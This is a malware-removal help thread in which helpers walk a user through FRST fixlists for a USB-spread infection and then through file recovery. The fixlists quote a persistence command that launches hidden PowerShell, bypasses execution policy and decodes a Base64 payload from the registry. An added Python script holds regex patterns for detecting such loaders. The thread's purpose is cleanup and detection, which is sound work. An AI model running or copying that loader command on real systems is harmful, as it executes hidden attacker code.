differentia / disorderstatus.ru

Hello

My PC (C: and D: drives) and my external HD (H: and I: drives) have been infected by this malware from a USB stick, and Avast emits intermittent alerts without, however, eliminating the threats. Logs are attached; unfortunately something breaks aswMBR before the scan completes, so I have provided the Windows report instead of the aswMBR log.

Thanks to anyone who can help. ;D

Looks like you got two for the price of one here

CAUTION: This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint:
HKLM\...\Policies\Explorer\Run: [127107158] => C:\ProgramData\msutbdt.exe [101586944 2015-06-15] ()
HKU\S-1-5-21-2771414842-448429842-2593070003-1000\...\Run: [{3391B05F-0744-44BB-BC93-C673423EAA57}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ILCaYqhsjqyxl').tRqm)));
C:\Users\Todos os Usuários\msutbdt.exe
2015-07-15 10:37 - 2015-06-15 18:42 - 101586944 ___SH () C:\ProgramData\msutbdt.exe
DeleteKey: HKCU\Software\Classes\ILCaYqhsjqyxl
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix.
On completion a log will be generated; please post that.

THEN

Please download AdwCleaner by Xplode onto your desktop.

- Close all open programs and internet browsers.
- Double click on AdwCleaner.exe to run the tool.
- Click on Scan.
- After the scan is complete click on "Clean".
- Confirm each time with Ok.
- Your computer will be rebooted automatically. A text file will open after the restart.
- Please post the content of that logfile with your next answer.
- You can find the logfile at C:\AdwCleaner[S0].txt as well.
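The two autorun entries and the hidden+system file in the fixlist above are the detection-relevant part of this thread: a Run value that starts PowerShell with a hidden window and an execution-policy bypass, then decodes a Base64 blob stored in an unrelated registry key and passes it to iex. Below is an added Python triage script, not part of the thread, of FRST or of the fixlist, that runs those indicators over FRST-style log lines. The sample lines are the page's own Run and file entries plus two constructed benign lines; the regular expressions are my approximation of FRST's line layout, not FRST's specification, and the script only reports, it changes nothing.

```python
"""Triage FRST-style log lines for the persistence pattern seen in this thread.

Added example for this thread; not part of FRST or of the fixlist above.
The line layouts below approximate FRST's output and are not a specification.
Detection only: nothing here touches the registry or the file system.
"""
import re
from dataclasses import dataclass, field

# Autorun entry: "<hive>\...\Run: [<value name>] => <command>"
RUN_LINE = re.compile(r"^(?P<key>HK\S*?Run): \[(?P<name>[^\]]*)\] => (?P<cmd>.*)$")

# File entry: "<created> - <modified> - <size> <attrs> (<company>) <path>"
# attrs is a five-character field in which 'S' marks system and 'H' hidden.
FILE_LINE = re.compile(
    r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2} - \d{4}-\d{2}-\d{2} \d{2}:\d{2} - "
    r"(?P<size>\d+) (?P<attrs>[_A-Z]{5}) \((?P<company>[^)]*)\) (?P<path>.+)$"
)

# Indicators of a PowerShell loader that hides its window and fetches its
# stage from somewhere other than the command line itself.
PS_INDICATORS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "execution policy bypass": re.compile(r"-e(?:xecutionpolicy)?\s+bypass", re.I),
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "base64 decode": re.compile(
        r"FromBase64String|-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "stage read from registry": re.compile(
        r"\b(?:gp|get-itemproperty)\b\s+['\"]?HK(?:CU|LM):", re.I),
}

# An autorun target sitting in a user-writable data directory, not Program Files.
USER_WRITABLE_EXE = re.compile(r"\\(?:ProgramData|AppData)\\[^\s\[]*\.exe\b", re.I)

# Constructed sample: the Run and file entries quoted in the thread, plus two
# benign lines (a Windows tray helper and an ordinary directory) for contrast.
SAMPLE_LINES = [
    r"HKLM\...\Policies\Explorer\Run: [127107158] => C:\ProgramData\msutbdt.exe [101586944 2015-06-15] ()",
    r"HKU\S-1-5-21-2771414842-448429842-2593070003-1000\...\Run: [{3391B05F-0744-44BB-BC93-C673423EAA57}] "
    r"=> powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex "
    r"([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ILCaYqhsjqyxl').tRqm)))",
    r"HKLM\...\Run: [SecurityHealth] => C:\Windows\System32\SecurityHealthSystray.exe [1 2015-01-01] (Microsoft Corporation)",
    r"2015-07-15 10:37 - 2015-06-15 18:42 - 101586944 ___SH () C:\ProgramData\msutbdt.exe",
    r"2015-07-15 10:37 - 2015-07-15 10:37 - 0000000 ____D () C:\Users\user\Documents\notes",
]


@dataclass
class Finding:
    line: str
    reason: str
    indicators: list = field(default_factory=list)


def triage_run_entry(line):
    """Return a Finding for a suspicious autorun line, else None."""
    m = RUN_LINE.match(line)
    if not m:
        return None
    cmd = m.group("cmd")
    if re.search(r"powershell(?:\.exe)?", cmd, re.I):
        hits = [name for name, rx in PS_INDICATORS.items() if rx.search(cmd)]
        if hits:
            return Finding(line, f"{m.group('key')} launches an obfuscated PowerShell stage", hits)
    if USER_WRITABLE_EXE.search(cmd):
        # FRST prints "()" when the binary carries no company/publisher string.
        return Finding(line, f"{m.group('key')} points at an executable in a user-writable data directory",
                       ["no publisher"] if "()" in cmd else [])
    return None


def triage_file_entry(line):
    """Return a Finding for an executable carrying both hidden and system attributes."""
    m = FILE_LINE.match(line)
    if not m:
        return None
    attrs, path = m.group("attrs"), m.group("path")
    if "S" in attrs and "H" in attrs and path.lower().endswith(".exe"):
        return Finding(line, "hidden+system executable", [attrs])
    return None


def triage(lines):
    """Run both checks over every line and collect the findings in input order."""
    findings = []
    for raw in lines:
        line = raw.strip()
        finding = triage_run_entry(line) or triage_file_entry(line)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"[!] {f.reason}: {', '.join(f.indicators) or '-'}\n    {f.line}")
```

Run against a saved FRST.txt the same way (`triage(open("FRST.txt", encoding="utf-8"))`); an entry that trips several PowerShell indicators at once, or a hidden+system executable with no publisher under ProgramData, is what to put in front of the helper rather than act on yourself, since the fixlist has to match the specific machine.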

hehe… I never had luck with malware sales.

Question: do I need to have my external HD drive connected to perform these steps?

Thanks for your attention, essexboy

Question: do I need to have my external HD drive connected to perform these steps?
No... don't plug it in before essexboy says so

Hi, Pondus.

Steps were done and logs sent without the removable drives connected.

Now you wait for Essexboy... it may take some hours before he is back online.

Thumbs up

Could you confirm all alerts have now ceased? :)

Wow, great job essexboy!

No alerts in the last 20 minutes and the PC appears faster than before infection.

But my removable drive is no longer recognized. :(

Did you scan it with MCShield? Is it a USB stick?

I tried, but the computer no longer recognizes the external HD, so there is no scanning.

A Samsung 350GB SATA drive in a 3.5" external case, USB 2.0.

What error do you get when you plug in the USB drive?

Ok, suddenly the system recognized the external HD and MCShield completed the log. I honestly do not know what I did, but it is working. :o

Unfortunately, the external HD still continues with strange behavior (see attached pictures), cannot be ejected, and apparently I have lost 15GB of content. Please continue helping me, as if this loss is true, I will have many professional and academic problems.

The other issue, the intermittent warnings about differentia / disorderstatus, was 100% settled, except that now the computer always starts with a minimized program called WindowsPowerShell from System32. What is this?

Could you run a fresh FRST scan for me please?

With MCShield, did you set it up as follows?

Download MCShield to your desktop and install
It will initially run a scan and show the result as a toaster by the system clock
Then in the control centre select scanner and tick unhide items on flash drives

https://dl.dropbox.com/u/73555776/mcshield%20unhide.JPG

Plug in the drive and MCShield will start a scan

Then get the log which will be located under the logs tab on the main page

And post that

Here’s MCShield log.

Here’s FRST log.

Intriguing, the PowerShell entry returned... Firefox has a multitude of unsigned extensions, and I do mean a lot; it may be worth uninstalling and reinstalling FF to make it run smoother.

Have the hidden files returned on your external drive?

CAUTION: This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint:
HKU\S-1-5-21-2771414842-448429842-2593070003-1000\...\Run: [{3391B05F-0744-44BB-BC93-C673423EAA57}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ILCaYqhsjqyxl').tRqm)));
2015-07-10 01:52 - 2015-07-10 01:52 - 0000000 _____ () C:\Users\user\AppData\Local\{C5CF6476-8F6E-4147-9AEA-8FF714308F1A}
DeleteKey: HKCU\Software\Classes\ILCaYqhsjqyxl
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix.
On completion a log will be generated; please post that.

I am a publicist and unfortunately these extensions are part of my work, so much so that they did not cause problems in the two years I have had them, prior, of course, to today's pendrive infection.

And no, the external drive did not return to normal behavior; what more can I do?

Has the PowerShell popup now disappeared?

Have you a backup or image of the drive?

If not you may be able to use one of the following

Previous Versions

- Right-click the file/folder and click Properties.
- Click Previous Versions.
- This tab will list all copies of the file and the date they were backed up.
- To restore a particular version of the file, click Copy and select the directory you wish to restore the file to.
- If you wish to restore the selected file and replace the existing one, click Restore.
- If you wish to view the contents of the file before restoring, click Open.

ShadowExplorer

- Please download http://www.shadowexplorer.com/uploads/ShadowExplorer-0.9-portable.zip and save the file to your Desktop.
- Right-click ShadowExplorer-0.9-portable.zip and click Extract All. Select your Desktop and click Extract.
- Right-click ShadowExplorer.exe and select Run as administrator to run the programme.
- You will see a drop-down menu with the shadow copies of all partitions and disks present.
- Click C:\ from the drop-down menu.
- To the right, pick a date prior to the infection from the drop-down menu.
- To restore a whole folder, right-click on your desired folder and click Export. You will then be prompted as to where you would like to restore the contents of the folder to.


File Recovery Software

File Recovery Software may be able to recover the original file deleted by the infection. Please bear in mind, the more you use the machine after the files are encrypted, the harder it will be for the recovery software to recover your files.

- R-Studio
- Photorec
- Recuva

No, boy, unfortunately I was organizing the files to back up and this is my only copy.

I will follow your suggestions and post the results here shortly, but first I have some questions:

1 - Could the missing folder be recovered with the command C:>attrib -h -r -s /s /d h:*.* ?

2 - Is it possible to suggest to Avast more informative popup warnings, such as DO NOT CONNECT REMOVABLE DEVICES UNTIL ATTACKS HAVE BEEN SOLVED? As it is, we have the impression that the antivirus just wants to inform you that it has blocked an attack, omitting that it let a whole infection spread.